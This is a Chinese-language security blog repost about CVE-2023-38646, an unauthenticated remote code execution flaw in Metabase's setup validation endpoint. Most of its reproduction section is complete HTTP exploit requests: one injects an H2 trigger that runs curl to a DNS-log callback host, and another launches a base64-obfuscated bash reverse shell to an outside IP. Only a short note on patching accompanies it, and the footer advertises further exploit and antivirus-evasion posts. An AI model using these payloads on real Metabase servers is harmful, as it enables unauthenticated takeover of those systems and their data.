CVE-2023-38646 RCE漏洞(附EXP)

admin 2023年8月1日13:17:38评论332 views字数 3270阅读10分54秒阅读模式

CVE-2023-38646 RCE漏洞(附EXP)

0x01 前言

Metabase 是一个开源数据分析平台,0.46.6.1 之前的开源 Metabase 和 1.46.6.1 之前的 Metabase Enterprise 允许未经身份验证的攻击者以服务器的权限级别在服务器上执行任意命令。此问题是由设置请求中的 JDBC url 攻击引起的,攻击者通过漏洞可以执行任意命令,导致服务器失陷,获取服务器权限

0x02 影响平台

Metabase open source >= 0.46.6.1Metabase Enterprise >= 1.46.6.1Metabase open source >= v0.45.4.1Metabase Enterprise >= v1.45.4.1Metabase open source >= v0.44.7.1Metabase Enterprise >= v1.44.7.1Metabase open source >= v0.43.7.2Metabase Enterprise >= v1.43.7.2

0x03 漏洞复现

页面是这个酱紫

CVE-2023-38646 RCE漏洞(附EXP)

EXP:

POST /api/setup/validate HTTP/1.1Host: ip:portSec-Ch-Ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 750
{ "token": "a50eb257-e56c-4dd8-b4ba-e67d7bc59261", "details": { "is_on_demand": false, "is_full_sync": false, "is_sample": false, "cache_ttl": null, "refingerprint": false, "auto_run_queries": true, "schedules": {}, "details": { "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascriptnjava.lang.Runtime.getRuntime().exec('curl ui88te.dnslog.cn')n$$--=x", "advanced-options": false, "ssl": true }, "name": "an-sec-research-team", "engine": "h2" }}

success

CVE-2023-38646 RCE漏洞(附EXP)

反弹shell如下PAYLOAD:

POST /api/setup/validate HTTP/1.1Host: 127.0.0.1:3000Sec-Ch-Ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 750
{ "token": "a50eb257-e56c-4dd8-b4ba-e67d7bc59261", "details": { "is_on_demand": false, "is_full_sync": false, "is_sample": false, "cache_ttl": null, "refingerprint": false, "auto_run_queries": true, "schedules": {}, "details": { "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascriptnjava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYwLjEyOS84ODg4ICAwPiYx}|{base64,-d}|{bash,-i}')n$$--=x", "advanced-options": false, "ssl": true }, "name": "an-sec-research-team", "engine": "h2" }}

0x04 参考来源

https://mp.weixin.qq.com/s/PUjrLI-IzBeDtZVXqpuDDg

0x05 修复方案

目前厂商已发布升级补丁以修复漏洞,建议及时更新至最新版本!https://www.metabase.com/blog/security-advisoryhttps://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

高薪招聘 | 临近HW大量招兵买马~抓住hvv直通车的尾巴!
点击文末阅读原文报名投递简历即可
备注【EchoSec】可优先内推

CVE-2023-38646 RCE漏洞(附EXP)

 CVE-2023-38646 RCE漏洞(附EXP)往期回顾

1111
  1.  | CVE-2023-33246 RCE漏洞(附EXP)

  2.  | 横向移动与域控权限维持方法总汇

  3.  | Apache HTTPd最新RCE漏洞复现

  4.  | CNVD-2023-34111 RCE漏洞(附EXP)

  5.  | Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

  6.  | MySQL数据库利用姿势

  7.  | phpMyAdmin漏洞利用汇总

  8.  | 泛微E-Mobile任意文件上传漏洞(附EXP)

  9.  | 小技巧~用一条命令来隐藏反向Shell

  10.  New免杀ShellCode加载器(附下载)

  11.  | 红队攻防 | 解决HW被疯狂封IP姿势~(附下载)


 

  1. CVE-2023-38646 RCE漏洞(附EXP)

    关注我

    获得更多精彩

    CVE-2023-38646 RCE漏洞(附EXP)


  2. 觉得内容不错,就点下在看
    如侵权请私聊公众号删文

原文始发于微信公众号(EchoSec):CVE-2023-38646 RCE漏洞(附EXP)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月1日13:17:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-38646 RCE漏洞(附EXP)http://cn-sec.com/archives/1925299.html

发表评论

匿名网友 填写信息